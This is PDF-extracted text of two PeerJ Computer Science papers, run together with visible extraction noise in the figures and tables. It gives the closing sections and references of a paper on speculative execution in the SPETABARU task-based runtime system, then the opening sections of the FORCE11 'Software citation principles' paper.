Number of iterations S pe ed up Spec(T=5/S=1) Spec(T=5/S=2) Spec(T=5/S=3) Spec(T=5/S=4) Spec(T=5/S=5) Rej(T=5) (b) Speedup over the Task-based executions Figure 12. Performance for the MC simulation with 5 domains. Spec(T=10/*) and Spec(T=20/*). In terms of speedup, increasing the number of consecutive speculative409 tasks does not improve the performance. For instance, S=2 is always faster because the speculation410 succeed with a probability of only 0.3 (see Fig. 13b). Of course, we see that having more threads increases411 the all reject configuration Rej performance, and more precisely the more threads we have the faster it412 executes.413 16/20 PeerJ Comput. Sci. reviewing PDF | (CS-2018:12:33617:1:1:NEW 15 Feb 2019) Manuscript to be reviewedComputer Science Figure 12 Performance for the MC simulation with five domains. (A) Execution time; (B) Speedup over the Task-based executions. Full-size DOI: 10.7717/peerjcs.183/fig-12 Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 20/25 https://peerj.com https://doi.org/10.7717/peerjcs.183/fig-12 http://dx.doi.org/10.7717/peerj-cs.183 10 100 10 100 Number of iterations T im e (s ) Task-based (T=5) Spec(T=5/S=4) Spec(T=10/S=2) Spec(T=10/S=4) Rej(T=10/S=5) Spec(T=20/S=2) Spec(T=20/S=4) Rej(T=20/S=5) (a) Execution time 5 10 25 50 100 1 1.5 2 2.5 3 3.5 4 4.5 0. 77 0. 71 0. 72 0. 69 0. 7 1. 39 1. 25 1. 3 1. 3 1. 241. 28 1. 11 1. 13 1. 12 1. 06 1. 75 1 .8 3 1. 9 1. 93 1. 83 1. 39 1. 26 1. 3 1. 53 1. 25 1. 6 1. 25 1. 22 1. 42 1. 15 2. 86 3. 33 3. 63 4. 4 3. 62 Number of iterations S pe ed up Spec(T=5/S=4) Spec(T=10/S=2) Spec(T=10/S=4) Rej(T=10/S=5) Spec(T=20/S=2) Spec(T=20/S=4) Rej(T=20/S=5) (b) Speedup over the Task-based executions Figure 13. Performance for the REMC simulation with 5 replicas and 5 domains per replica. 6 CONCLUSION414 In the current paper, we provided the first results of using speculation in task-based RS’s. We described a415 general pattern and the algorithm of a predictive-oriented approach. Our RS, SPETABARU, is able to416 execute speculative task flows, and we demonstrate that the obtained speedup for both the MC and REMC417 is close to the theoretical one of 30%, when the probability to accept changes is 1/2. The mechanism418 we proposed can be easily incorporated in any other runtime system. However, the fact that we used the419 C++ language is an important asset because it makes it possible to generate functions capable of copying420 17/20 PeerJ Comput. Sci. reviewing PDF | (CS-2018:12:33617:1:1:NEW 15 Feb 2019) Manuscript to be reviewedComputer Science Figure 13 Performance for the REMC simulation with five replicas and five domains per replica. (A) Execution time; (B) Speedup over the Task-based executions. Full-size DOI: 10.7717/peerjcs.183/fig-13 (selecting) user’s data. The implementation of our system using a low-level language would require using advanced programming from the user perspective such as function pointers. The number of failures can reduce the benefits and, in the worst case, lead to underperformance when the runtime generates too many tasks for the available CPU Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 21/25 https://peerj.com https://doi.org/10.7717/peerjcs.183/fig-13 http://dx.doi.org/10.7717/peerj-cs.183 cores. In addition, our system uses duplication of data such that memory limits could be reached if the system is not used carefully. For these reasons, as perspective, we would like to address three major points. First, we would like to automatically limit the degree of speculation (the number of consecutive uncertain tasks). Then, we would like to implement the eager approach to speculate again after a failure in a STG and to obtain a speedup of 2 for MC/REMC simulations. Finally, we would like to study the speculation/decision formula. The resulting process should look at the available ready tasks as the number of threads and certainly use a historical model of the previous execution to predict cleverly if enabling the speculation is appropriate. This will allow removing the possible overhead of the speculation when there is no need to increase the degree of parallelism at some points of the execution. ACKNOWLEDGEMENTS Work by Berenger Bramas was partially done at the Max Planck Computing and Data Facility (MPCDF), Garching, Germany. Experiments presented in this paper were carried out using the PlaFRIM experimental testbed, supported by Inria, CNRS (LABRI and IMB), Université de Bordeaux, Bordeaux INP and Conseil Régional d’Aquitaine ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Bérenger Bramas conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Data is available at GitHub: https://gitlab.inria.fr/bramas/spetabaru. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.183#supplemental-information. REFERENCES Agullo E, Aumage O, Bramas B, Coulaud O, Pitoiset S. 2017. Bridging the gap between OpenMP and task-based runtime systems for the fast multipole method. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 22/25 https://peerj.com https://gitlab.inria.fr/bramas/spetabaru http://dx.doi.org/10.7717/peerj-cs.183#supplemental-information http://dx.doi.org/10.7717/peerj-cs.183#supplemental-information http://dx.doi.org/10.7717/peerj-cs.183 IEEE Transactions on Parallel and Distributed Systems 28(10):2794–2807 DOI 10.1109/TPDS.2017.2697857. Agullo E, Bramas B, Coulaud O, Darve E, Messner M, Takahashi T. 2016a. Task-based FMM for heterogeneous architectures. Concurrency and Computation: Practice and Experience 28(9):2608–2629 DOI 10.1002/cpe.3723. Agullo E, Buttari A, Guermouche A, Lopez F. 2016b. Implementing multifrontal sparse solvers for multicore architectures with sequential task flow runtime systems. ACM Transactions on Mathematical Software 43(2):13:1–13:22 DOI 10.1145/2898348. Altekar G, Dwarkadas S, Huelsenbeck JP, Ronquist F. 2004. Parallel metropolis coupled Markov chain Monte Carlo for Bayesian phylogenetic inference. Bioinformatics 20(3):407–415 DOI 10.1093/bioinformatics/btg427. APOLLO. 2016. APOLLO—automatic speculative polyhedral loop optimizer. Available at http://apollo.gforge.inria.fr/ . Augonnet C, Thibault S, Namyst R, Wacrenier P-A. 2011. StarPU: a unified platform for task scheduling on heterogeneous multicore architectures. Concurrency and Computation: Practice and Experience 23(2):187–198 DOI 10.1002/cpe.1631. Ayguadé E, Copty N, Duran A, Hoeflinger J, Lin Y, Massaioli F, Teruel X, Unnikrish- nan P, Zhang G. 2009. The design of OpenMP tasks. IEEE Transactions on Parallel and Distributed Systems 20(3):404–418 DOI 10.1109/TPDS.2008.105. Bauer M, Treichler S, Slaughter E, Aiken A. 2012. Legion: expressing locality and independence with logical regions. In: International conference on high performance computing, networking, storage and analysis. Piscataway: IEEE, 66. Blumofe RD, Joerg CF, Kuszmaul BC, Leiserson CE, Randall KH, Zhou Y. 1996. Cilk: an efficient multithreaded runtime system. Journal of Parallel and Distributed Computing 37(1):55–69 DOI 10.1006/jpdc.1996.0107. Chronaki K, Casas M, Moreto M, Bosch J, Badia RM. 2018. TaskGenX: a hardware- software proposal for accelerating task parallelism. In: Yokota R, Weiland M, Keyes D, Trinitis C, eds. High performance computing. Cham: Springer International Publishing, 389–409. Cosnard M, Loi M. 1995. Automatic task graph generation techniques. In: Proceedings of the twenty-eighth annual Hawaii international conference on system sciences, vol. 2. Piscataway: IEEE, 113–122 DOI 10.1109/HICSS.1995.375471. Danalis A, Bosilca G, Bouteiller A, Herault T, Dongarra J. 2014. PTG: an abstraction for unhindered parallelism. In: Proceedings of the fourth international workshop on domain-specific languages and high-level frameworks for high performance computing, (WOLFHPC). Piscataway: IEEE, 21–30 DOI 10.1109/WOLFHPC.2014.8. Duran A, Ayguadé E, Badia RM, Labarta J, Martinell L, Martorell X, Planas J. 2011. OmpSs: a proposal for programming heterogeneous multi-core architectures. Parallel Processing Letters 21(02):173–193 DOI 10.1142/S0129626411000151. Gautier T, Lima JV, Maillard N, Raffin B. 2013. XKaapi: a runtime system for data- flow task programming on heterogeneous architectures. In: Parallel & distributed processing (IPDPS), 2013 IEEE 27th international symposium on. Piscataway: IEEE, 1299–1308 DOI 10.1109/IPDPS.2013.66. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 23/25 https://peerj.com http://dx.doi.org/10.1109/TPDS.2017.2697857 http://dx.doi.org/10.1002/cpe.3723 http://dx.doi.org/10.1145/2898348 http://dx.doi.org/10.1093/bioinformatics/btg427 http://apollo.gforge.inria.fr/ http://dx.doi.org/10.1002/cpe.1631 http://dx.doi.org/10.1109/TPDS.2008.105 http://dx.doi.org/10.1006/jpdc.1996.0107 http://dx.doi.org/10.1109/HICSS.1995.375471 http://dx.doi.org/10.1109/WOLFHPC.2014.8 http://dx.doi.org/10.1142/S0129626411000151 http://dx.doi.org/10.1109/IPDPS.2013.66 http://dx.doi.org/10.7717/peerj-cs.183 Gross J, Janke W, Bachmann M. 2011. A GPU approach to parallel replica-exchange polymer simulations. Physics Procedia 15:29–32 DOI 10.1016/j.phpro.2011.05.055. Intel. 2017a. Intel Cilk Plus. Available at https://www.cilkplus.org/ . Intel. 2017b. Threading Building Blocks (TBB). Available at https://www.threadingbuildingblocks.org/ . Jeffrey MC, Subramanian S, Yan C, Emer J, Sanchez D. 2015. A scalable archi- tecture for ordered parallelism. In: Microarchitecture (MICRO), 2015 48th annual IEEE/ACM international symposium on. Piscataway: IEEE, 228–241 DOI 10.1145/2830772.2830777. Kale LV, Krishnan S. 1993. CHARM++: a portable concurrent object oriented system based on C++. In: ACM Sigplan Notices. vol. 28. New York: ACM, 91–108. Kim YC, Hummer G. 2008. Coarse-grained models for simulations of multipro- tein complexes: application to ubiquitin binding. Journal of Molecular Biology 375(5):1416–1433 DOI 10.1016/j.jmb.2007.11.063. Leiserson CE. 2009. The Cilk++ concurrency platform. In: 46th ACM/IEEE design automation conference, 2009. DAC’09. Piscataway: IEEE, 522–527. Martinez Caamaño JM, Selva M, Clauss P, Baloian A, Wolff W. 2017. Full runtime polyhedral optimizing loop transformations with the generation, instantiation, and scheduling of code-bones. Concurrency and Computation: Practice and Experience 29(15):e4192 DOI 10.1002/cpe.4192. OpenMP Architecture Review Board. 1997. OpenMP fortran application program interface 1.0. Available at http://www.openmp.org/wp-content/uploads/fspec10.pdf . OpenMP Architecture Review Board. 2008. OpenMP application program interface version 3.0. Available at http://www.openmp.org/wp-content/uploads/spec30.pdf . OpenMP Architecture Review Board. 2013. OpenMP application program interface version 4.0. Available at http://www.openmp.org/wp-content/uploads/OpenMP4.0. 0.pdf . Perez JM, Badia RM, Labarta J. 2008. A dependency-aware task-based programming environment for multi-core architectures. In: Cluster computing, 2008 IEEE interna- tional conference on. Piscataway: IEEE, 142–151 DOI 10.1109/CLUSTR.2008.4663765. Salamanca J, Amaral JN, Araujo G. 2017. Using hardware-transactional-memory support to implement thread-level speculation. In: IEEE transactions on parallel and distributed systems. Piscataway: IEEE. Steffan JG, Mowry TC. 1998. The potential for using thread-level data speculation to facilitate automatic parallelization. In: High-performance computer architecture, 1998. Proceedings., 1998 Fourth international symposium on. Piscataway: IEEE, 2–13 DOI 10.1109/HPCA.1998.650541. Tagliavini G, Cesarini D, Marongiu A. 2018. Unleashing fine-grained paral- lelism on embedded many-core accelerators with lightweight OpenMP task- ing. IEEE Transactions on Parallel and Distributed Systems 29(9):2150–2163 DOI 10.1109/TPDS.2018.2814602. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 24/25 https://peerj.com http://dx.doi.org/10.1016/j.phpro.2011.05.055 https://www.cilkplus.org/ https://www.threadingbuildingblocks.org/ http://dx.doi.org/10.1145/2830772.2830777 http://dx.doi.org/10.1016/j.jmb.2007.11.063 http://dx.doi.org/10.1002/cpe.4192 http://www.openmp.org/wp-content/uploads/fspec10.pdf http://www.openmp.org/wp-content/uploads/spec30.pdf http://www.openmp.org/wp-content/uploads/OpenMP4.0.0.pdf http://www.openmp.org/wp-content/uploads/OpenMP4.0.0.pdf http://dx.doi.org/10.1109/CLUSTR.2008.4663765 http://dx.doi.org/10.1109/HPCA.1998.650541 http://dx.doi.org/10.1109/TPDS.2018.2814602 http://dx.doi.org/10.7717/peerj-cs.183 Thachuk C, Shmygelska A, Hoos HH. 2007. A replica exchange Monte Carlo al- gorithm for protein folding in the HP model. BMC Bioinformatics 8(1):342 DOI 10.1186/1471-2105-8-342. Thoman P, Dichev K, Heller T, Iakymchuk R, Aguilar X, Hasanov K, Gschwandtner P, Lemarinier P, Markidis S, Jordan H, Fahringer T, Katrinis K, Laure E, Nikolopou- los DS. 2018. A taxonomy of task-based parallel programming technologies for high- performance computing. The Journal of Supercomputing 74(4):1422–1434. Tillenius M. 2015. Superglue: a shared memory framework using data versioning for dependency-aware task-based parallelization. SIAM Journal on Scientific Computing 37(6):C617–C642 DOI 10.1137/140989716. Treikalis A, Merzky A, Chen H, Lee T-S, York DM, Jha S. 2016. RepEx: a flexible framework for scalable replica exchange molecular dynamics simulations. In: Parallel processing (ICPP), 2016 45th international conference on. Piscataway: IEEE, 628–637 DOI 10.1109/ICPP.2016.78. Zhou C, Lang X, Wang Y, Zhu C, Lu Z, Chi X. 2013. Parallel metropolis coupled Markov chain Monte Carlo for isolation with migration model. Applied Mathematics & Information Sciences 7(1L):219–224 DOI 10.12785/amis/071L30. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 25/25 https://peerj.com http://dx.doi.org/10.1186/1471-2105-8-342 http://dx.doi.org/10.1137/140989716 http://dx.doi.org/10.1109/ICPP.2016.78 http://dx.doi.org/10.12785/amis/071L30 http://dx.doi.org/10.7717/peerj-cs.183 work_zmw4nyamdvhgbjpenjnarukk7m ---- Software citation principles Software citation principles Arfon M. Smith1 ,*, Daniel S. Katz2,*, Kyle E. Niemeyer3,* and FORCE11 Software Citation Working Group 1 GitHub, Inc., San Francisco, California, United States 2 National Center for Supercomputing Applications & Electrical and Computer Engineering Department & School of Information Sciences, University of Illinois at Urbana-Champaign, Urbana, Illinois, United States 3 School of Mechanical, Industrial, and Manufacturing Engineering, Oregon State University, Corvallis, Oregon, United States * These authors contributed equally to this work. ABSTRACT Software is a critical part of modern research and yet there is little support across the scholarly ecosystem for its acknowledgement and citation. Inspired by the activities of the FORCE11 working group focused on data citation, this document summarizes the recommendations of the FORCE11 Software Citation Working Group and its activities between June 2015 and April 2016. Based on a review of existing community practices, the goal of the working group was to produce a consolidated set of citation principles that may encourage broad adoption of a consistent policy for software citation across disciplines and venues. Our work is presented here as a set of software citation principles, a discussion of the motivations for developing the principles, reviews of existing community practice, and a discussion of the requirements these principles would place upon different stakeholders. Working examples and possible technical solutions for how these principles can be implemented will be discussed in a separate paper. Subjects Digital Libraries, Software Engineering Keywords Software citation, Software credit, Attribution SOFTWARE CITATION PRINCIPLES The main contribution of this document are the software citation principles, written fairly concisely in this section and discussed further later in the document (see Discussion). In addition, we also motivate the creation of these principles (see Motivation), describe the process by which they were created (see Process of Creating Principles), summarize use cases related to software citation (see Use Cases), and review related work (see Related Work). We also lay out the work needed to lead to these software citation principles being applied (see Future Work). 1. Importance: Software should be considered a legitimate and citable product of research. Software citations should be accorded the same importance in the scholarly record as citations of other research products, such as publications and data; they should be included in the metadata of the citing work, for example in the reference list of a journal article, and should not be omitted or separated. Software should be cited on the same basis as any other research product such as a paper or a book, that is, authors should cite the appropriate set of software products just as they cite the appropriate set of papers. How to cite this article Smith et al. (2016), Software citation principles. PeerJ Comput. Sci. 2:e86; DOI 10.7717/peerj-cs.86 Submitted 24 June 2016 Accepted 23 August 2016 Published 19 September 2016 Corresponding author Daniel S. Katz, d.katz@ieee.org Academic editor Silvio Peroni DOI 10.7717/peerj-cs.86 Copyright 2016 Smith et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.86 mailto:d.�katz@�ieee.�org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.86 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ 2. Credit and attribution: Software citations should facilitate giving scholarly credit and normative, legal attribution to all contributors to the software, recognizing that a single style or mechanism of attribution may not be applicable to all software. 3. Unique identification: A software citation should include a method for identification that is machine actionable, globally unique, interoperable, and recognized by at least a community of the corresponding domain experts, and preferably by general public researchers. 4. Persistence: Unique identifiers and metadata describing the software and its disposition should persist—even beyond the lifespan of the software they describe. 5. Accessibility: Software citations should facilitate access to the software itself and to its associated metadata, documentation, data, and other materials necessary for both humans and machines to make informed use of the referenced software. 6. Specificity: Software citations should facilitate identification of, and access to, the specific version of software that was used. Software identification should be as specific as necessary, such as using version numbers, revision numbers, or variants such as platforms. MOTIVATION As the process of research 1 has become increasingly digital, research outputs and products have grown beyond simply papers and books to include software, data, and other electronic components such as presentation slides, posters, (interactive) graphs, maps, websites (e.g., blogs and forums), and multimedia (e.g., audio and video lectures). Research knowledge is embedded in these components. Papers and books themselves are also becoming increasingly digital, allowing them to become executable and reproducible. As we move towards this future where research is performed in and recorded as a variety of linked digital products, the characteristics and properties that developed for books and papers need to be applied to, and possibly adjusted for, all digital products. Here, we are concerned specifically with the citation of software products. The challenge is not just the textual citation of software in a paper, but the more general identification of software used within the research process. This work focuses on making software a citable entity in the scholarly ecosystem. While software products represent a small fraction of the sum total of research output, this work together with other efforts such as the FORCE11 Data Citation Principles (Data Citation Synthesis Group, 2014; Starr et al., 2015) collectively represent an effort to better describe (and cite) all outputs of research. Software and other digital resources currently appear in publications in very inconsistent ways. For example, a random sample of 90 articles in the biology literature found seven different ways that software was mentioned, including simple names in the full-text, URLs in footnotes, and different kinds of mentions in reference lists: project names or websites, user manuals or publications that describe or introduce the software (Howison & Bullard, 2015). Table 1 shows examples of these varied forms of software mentions and the frequency with which they were encountered. Many of these kinds of mentions fail to perform the functions needed 1 We use the term “research” in this document to include work intended to increase human knowledge and benefit society, in science, engineering, humanities, and other areas. Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 2/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ of citations, and their very diversity and frequent informality undermine the integration of software work into bibliometrics and other analyses. Studies on data and facility citation have shown similar results (Huang, Rose & Hsu, 2015; Mayernik, Maull & Hart, 2015; Parsons, Duerr & Minster, 2010). There are many reasons why this lack of both software citations in general and standard practices for software citation are of concern: � Understanding research fields: Software is a product of research, and by not citing it we leave holes in the record of research of progress in those fields. � Credit: Academic researchers at all levels, including students, postdocs, faculty, and staff, should be credited for the software products they develop and contribute to, particularly when those products enable or further research done by others. 2 Non-academic researchers should also be credited for their software work, though the specific forms of credit are different than for academic researchers. � Discovering software: Citations enable the specific software used in a research product to be found. Additional researchers can then use the same software for different purposes, leading to credit for those responsible for the software. � Reproducibility: Citation of specific software used is necessary for reproducibility, although not sufficient. Additional information such as configurations and platform issues are also needed. PROCESS OF CREATING PRINCIPLES The FORCE11 Software Citation Working Group was created in April 2015 with the following mission statement: The software citation working group is a cross-team committee leveraging the perspectives from a variety of existing initiatives working on software citation to produce a consolidated set of citation principles in order to encourage broad adoption of a consistent policy for software citation across disciplines and venues. The working group will review existing efforts and make a set of recommendations. These recommendations will be put off for endorsement by the organizations represented by this group and others that play an important role in the community. Table 1 Varieties of software mentions in publications, from Howison & Bullard (2015). Mention type Count (n = 286) Percentage (%) Cite to publication 105 37 Cite to user’s manual 6 2 Cite to name or website 15 5 Instrument-like 53 19 URL in text 13 5 In-text name only 90 31 Not even name 4 1 2 Providing recognition of software can have tremendous economic impact as demonstrated by the role of Text REtrieval Conference (TREC) in information retrieval (Rowe et al., 2010). Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 3/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ The group will produce a set of principles, illustrated with working examples, and a plan for dissemination and distribution. This group will not be producing detailed specifications for implementation although it may review and discuss possible technical solutions. The group gathered members (see Appendix A) in April and May 2015, and then began work in June. This materialized as a number of meetings and offline work by group members to document existing practices in member disciplines; gather materials from workshops and other reports; review those materials, identifying overlaps and differences; create a list of use cases related to software citation, recorded in Appendix B; and subsequently draft an initial version of this document. The draft Software Citation Principles document was discussed in a day-long workshop and presented at the FORCE2016 Conference in April 2016 (https://www.force11.org/ meetings/force2016). Members of the workshop and greater FORCE11 community gave feedback, which we recorded here in Appendix C. This discussion led to some changes in the use cases and discussion, although the principles themselves were not modified. We also plan to initiate a follow-on implementation working group that will work with stakeholders to ensure that these principles impact the research process. The process of creating the software citation principles began by adapting the FORCE11 Data Citation Principles (Data Citation Synthesis Group, 2014). These were then modified based on discussions of the FORCE11 Software Citation Working Group (see Appendix A for members), information from the use cases in section Use Cases, and the related work in section Related Work. We made the adaptations because software, while similar to data in terms of not traditionally having been cited in publications, is also different than data. In the context of research (e.g., in science), the term “data” usually refers to electronic records of observations made in the course of a research study (“raw data”) or to information derived from such observations by some form of processing (“processed data”), as well as the output of simulation or modeling software (“simulated data”). Some confusion about the distinction between software and data comes in part from the much wider scope of the term “data” in computing and information science, where it refers to anything that can be processed by a computer. In that sense, software is just a special kind of data. Because of this, citing software is not the same as citing data. A more general discussion about these distinctions is currently underway (https://github.com/ danielskatz/software-vs-data). The principles in this document should guide further development of software citation mechanisms and systems, and the reader should be able to look at any particular example of software citation to see if it meets the principles. While we strive to offer practical guidelines that acknowledge the current incentive system of academic citation, a more modern system of assigning credit is sorely needed. It is not that academic software needs a separate credit system from that of academic papers, but that the need for credit for research software underscores the need to overhaul the system of credit for all research products. One possible solution for a more complete Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 4/31 https://www.force11.org/meetings/force2016 https://www.force11.org/meetings/force2016 https://github.com/danielskatz/software-vs-data https://github.com/danielskatz/software-vs-data http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ description of the citations and associated credit is the transitive credit proposed by Katz (2014) and Katz & Smith (2015). USE CASES We documented and analyzed a set of use cases related to software citation in FORCE11 Software Citation Working Group (https://docs.google.com/document/d/ 1dS0SqGoBIFwLB5G3HiLLEOSAAgMdo8QPEpjYUaWCvIU) (recorded in Appendix B for completeness). Table 2 summarizes these use cases and makes clear what the requirements are for software citation in each case. Each example represents a particular stakeholder performing an activity related to citing software, with the given metadata as information needed to do that. In that table, we use the following definitions: � “Researcher” includes both academic researchers (e.g., postdoc, tenure-track faculty member) and research software engineers. � “Publisher” includes both traditional publishers that publish text and/or software papers as well as archives such as Zenodo that directly publish software. � “Funder” is a group that funds software or research using software. � “Indexer” examples include Scopus, Web of Science, Google Scholar, and Microsoft Academic Search. � “Domain group/library/archive” includes the Astronomy Source Code Library (ASCL; http://ascl.net); biomedical and healthCAre Data Discovery Index Ecosystem (bioCADDIE; https://biocaddie.org); Computational Infrastructure for Geodynamics (CIG; https://geodynamics.org), libraries, institutional archives, etc. � “Repository” refers to public software repositories such as GitHub, Netlib, Comprehensive R Archive Network (CRAN), and institutional repositories. � “Unique identifier” refers to unique, persistent, and machine-actionable identifiers such as a DOI, ARK, or PURL. � “Description” refers to some description of the software such as an abstract, README, or other text description. � “Keywords” refers to keywords or tags used to categorize the software. � “Reproduce” can mean actions focused on reproduction, replication, verification, validation, repeatability, and/or utility. � “Citation manager” refers to people and organizations that create scholarly reference management software and websites including Zotero, Mendeley, EndNote, RefWorks, BibDesk, etc., that manage citation information and semi-automatically insert those citations into research products. All use cases assume the existence of a citable software object, typically created by the authors/developers of the software. Developers can achieve this by, e.g., uploading a software release to figshare (https://figshare.com/) or Zenodo (GitHub, 2014) to obtain a DOI. Necessary metadata should then be included in a CITATION file (Wilson, 2013) or machine-readable CITATION.jsonld file (Katz & Smith, 2015). When software is not Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 5/31 https://docs.google.com/document/d/1dS0SqGoBIFwLB5G3HiLLEOSAAgMdo8QPEpjYUaWCvIU https://docs.google.com/document/d/1dS0SqGoBIFwLB5G3HiLLEOSAAgMdo8QPEpjYUaWCvIU http://ascl.net https://biocaddie.org https://geodynamics.org https://figshare.com/ http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ T a b le 2 U se c a se s a n d b a si c m e ta d a ta re q u ir e m e n ts fo r so ft w a re c it a ti o n , a d a p te d fr o m F O R C E 1 1 S o ft w a re C it a ti o n W o rk in g G ro u p . S o li d ci rc le s (� ) in d ic a te th a t th e u se ca se d ep en d s o n th a t m et a d a ta , w h il e p lu s si g n s (+ ) in d ic a te th a t th e u se ca se w o u ld b en efi t fr o m th a t m et a d a ta if a v a il a b le . B a si c re q u ir e m e n ts U se c a se U n iq u e id e n ti fi e r S o ft w a re n a m e A u th o r( s) C o n tr ib u to r ro le V e rs io n n u m b e r R e le a se d a te L o c a ti o n / re p o si to r y In d e x e d c it a ti o n s S o ft w a re li ce n se D e sc ri p ti o n K e y w o rd s E x a m p le st a k e h o ld e r( s) 1 . U se so ft w a re fo r a p a p er � � � � � � + + R es ea rc h er 2 . U se so ft w a re in /w it h n ew so ft w a re � � � � � � + + R es ea rc h er , so ft w a re en g in ee r 3 . C o n tr ib u te to so ft w a re � � � + � � � + + R es ea rc h er , so ft w a re en g in ee r 4 . D et er m in e u se / ci ta ti o n s o f so ft w a re � � � R es ea rc h er , so ft w a re en g in ee r 5 . G et cr ed it fo r so ft w a re d ev el o p m en t � � � + � � + R es ea rc h er , so ft w a re en g in ee r 6 . “ R ep ro d u ce ” a n a ly si s � � � � � + + R es ea rc h er 7 . F in d so ft w a re to im p le m en t ta sk � � � � � + + + R es ea rc h er , so ft w a re en g in ee r 8 . P u b li sh so ft w a re p a p er � � � � � � P u b li sh er 9 . P u b li sh p a p er s th a t ci te so ft w a re � � � � � � � P u b li sh er 1 0 . B u il d ca ta lo g o f so ft w a re � � � � � � � + + + In d ex er 1 1 . B u il d so ft w a re ca ta lo g /r eg is tr y � � � � + + D o m a in g ro u p , li b ra ry , a rc h iv e 1 2 . S h o w sc ie n ti fi c im p a ct o f h o ld in g s � � � R ep o si to ry 1 3 . S h o w h o w fu n d ed so ft w a re h a s b ee n u se d � � � F u n d er , p o li cy m a k er 1 4 . E v a lu a te co n tr ib u ti o n s o f re se a rc h er � � + � � E v a lu a to r, fu n d er 1 5 . S to re so ft w a re en tr y � � � � � � + + C it a ti o n m a n a g er 1 6 . P u b li sh m ix ed d a ta /s o ft w a re p a ck a g es � � � � � � + + + R ep o si to ry , li b ra ry , a rc h iv e Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 6/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ freely available (e.g., commercial software) or when there is no clear identifier to use, alternative means may be used to create citable objects as discussed in section Access to Software. In some cases, if particular metadata are not available, alternatives may be provided. For example, if the version number and release date are not available, the download date can be used. Similarly, the contact name/email is an alternative to the location/repository. RELATED WORK With approximately 50 working group participants (see Appendix A) representing a range of research domains, the working group was tasked to document existing practices in their respective communities. A total of 47 documents were submitted by working group participants, with the life sciences, astrophysics, and geosciences being particularly well-represented in the submitted resources. General community/non domain-specific activities Some of the most actionable work has come from the UK Software Sustainability Institute (SSI) in the form of blog posts written by their community fellows. For example, in a blog post from 2012, Jackson (2012) discusses some of the pitfalls of trying to cite software in publications. He includes useful guidance for when to consider citing software as well as some ways to help “convince” journal editors to allow the inclusion of software citations. Wilson (2013) suggests that software authors include a CITATION file that documents exactly how the authors of the software would like to be cited by others. While this is not a formal metadata specification (e.g., it is not machine readable) this does offer a solution for authors wishing to give explicit instructions to potential citing authors and, as noted in the motivation section (see Motivation), there is evidence that authors follow instructions if they exist (Huang, Rose & Hsu, 2015). In a later post on the SSI blog, Jackson gives a good overview of some of the approaches package authors have taken to automate the generation of citation entities such as BIBTEX entries (Jackson, 2014), and Knepley et al. (2013) do similarly. While not usually expressed as software citation principles, a number of groups have developed community guidelines around software and data citation. Van de Sompel et al. (2004) argue for registration of all units of scholarly communication, including software. In “Publish or be damned? An alternative impact manifesto for research software,” Chue Hong (2011) lists nine principles as part of “The Research Software Impact Manifesto.” In the “Science Code Manifesto” (Barnes et al., 2016), the founding signatories cite five core principles (Code, Copyright, Citation, Credit, Curation) for scientific software. Perhaps in light of the broad range of research domains struggling with the challenge of better recognizing the role of software, funders and agencies in both the US (e.g., NSF, NIH, Alfred P. Sloan Foundation) and UK (e.g., SFTC, JISC, Wellcome Trust) have sponsored or hosted a number of workshops with participants from across a range of Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 7/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ disciplines, specifically aimed at discussing issues around software citation (Sufi et al., 2014; Ahalt et al., 2015; Software Credit Workshop, 2015; Norén, 2015; Software Attribution for Geoscience Applications, 2015; Allen et al., 2015). In many cases these workshops produced strong recommendations for their respective communities on how best to proceed. In addition, a number of common themes arose in these workshops, including (1) the critical need for making software more “citable” (and therefore actions authors and publishers should take to improve the status quo), (2) how to better measure the impact of software (and therefore attract appropriate funding), and (3) how to properly archive software (where, how, and how often) and how this affects what to cite and when. Most notable of the community efforts are those of WSSSPE Workshops (http://wssspe.researchcomputing.org.uk/) and SSI Workshops (http://www.software.ac.uk/ community/workshops), who between them have run a series of workshops aimed at gathering together community members with an interest in (1) defining the set of problems related to the role of software and associated people in research settings, particularly academia, (2) discussing potential solutions to those problems, (3) beginning to work on implementing some of those solutions. In each of the three years that WSSSPE workshops have run thus far, the participants have produced a report (Katz et al., 2014; Katz et al., 2016a; Katz et al., 2016b) documenting the topics covered. Section 5.8 and Appendix J in the WSSSPE3 report (Katz et al., 2016b) has some preliminary work and discussion particularly relevant to this working group. In addition, a number of academic publishers such as APA (McAdoo, 2015) have recommendations for submitting authors on how to cite software, and journals such as F1000Research (http://f1000research.com/for-authors/ article-guidelines/software-tool-articles), SoftwareX (http://www.journals.elsevier.com/ softwarex/), Open Research Computation (http://www.openresearchcomputation.com) and the Journal of Open Research Software (http://openresearchsoftware.metajnl.com) allow for submissions entirely focused on research software. Domain-specific community activities One approach to increasing software “citability” is to encourage the submission of papers in standard journals 